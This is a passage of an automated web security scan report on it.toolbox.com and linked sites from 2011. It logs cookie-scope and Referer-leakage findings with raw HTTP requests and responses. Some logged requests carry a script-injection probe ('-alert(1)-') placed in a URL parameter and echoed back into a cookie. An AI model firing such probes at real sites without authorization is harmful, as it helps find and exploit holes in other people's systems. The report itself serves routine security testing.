<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Technical D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69302 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Check B ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68773 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Emergen ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69404 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Wocket ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68626 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Two Old Pal ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66046 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Venture and ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81197 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Why Should ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&opi_o=5 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 39817 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: joinedfrom=title=Future States&url=http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&origin=5; domain=.toolbox.com; expires=Wed, 09-Feb-2011 14:47:17 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Register wi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jobs/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40888 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Jobs </tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trd/885101 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 223 Content-Type: text/html; charset=utf-8 Location: http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR IND UNI" Set-Cookie: EREF=dest=http%3a%2f%2fwindows.ittoolbox.com%2fresearch%2fwindows-7-deployment-an-insiders-guide-23009%3fr%3dOnlinePostingReminder&source=&rid=885101; domain=.toolbox.com; expires=Mon, 26-Jan-2015 14:46:39 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder">here</a>. ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243<ype=JSCR&lname=560x350v1&url=http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: links.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object Moved Connection: close Date: Wed, 26 Jan 2011 14:55:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: CP="CAO DSP COR CURa " Location: http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html Content-Type: text/html Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:49:31 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/ Location: http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&pccr=true&vidn=26A01A3D851D2B4A-60000137A054F13C&&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Tue, 25 Jan 2011 14:49:31 GMT Last-Modified: Thu, 27 Jan 2011 14:49:31 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www389 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/apiresults.js HTTP/1.1 Host: www.indeed.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
cae_browser=desktop; path=/; domain=.netapp.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: www.netapp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT X-Server-Name: dv-c1-r1-u14-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 26 Jan 2011 14:57:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com Content-Length: 104728
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cringely/pulpit/ HTTP/1.1 Host: www.pbs.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:09 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:12 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following links to other domains:
http://twitter.com/MaaS360
http://www.facebook.com/MaaS360
http://www.linkedin.com/companies/163792
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:55:34 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=fdc4855fe7a83f467607711e53c0ff7d; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26998
</iframe> ...[SNIP]... <br /> affiliated with or endorsed by any company listed at this site. Toolbox.com is a subsidiary of the <a href="http://www.exbd.com/">Corporate Executive Board</a> ...[SNIP]... <noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.toolbox.com/b/ss/ittoolglobal,ittoolglobalit/1/H.17--NS/0" height="1" width="1" border="0" alt="" /> ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/iphone-app/
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1023555694/Top1/BBN/Default_Toolbox_Universal_Multi/iPhone_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/iphone-app/ Content-Length: 310 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/iphone-app/">here</a>.</p ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/ask-a-question
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1306774515/Top1/BBN/Default_Toolbox_Universal_Multi/ask_a_question_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/ask-a-question Content-Length: 313 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/ask-a-question">here</a>. ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/iphone-app/
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1311919668/Top1/BBN/Default_Toolbox_Universal_Multi/iPhone_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/iphone-app/ Content-Length: 310 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/iphone-app/">here</a>.</p ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/ask-a-question
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/627413912/Top1/BBN/Default_Toolbox_Universal_Multi/ask_a_question_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/ask-a-question Content-Length: 313 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/ask-a-question">here</a>. ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/companies/white-papers/
Request
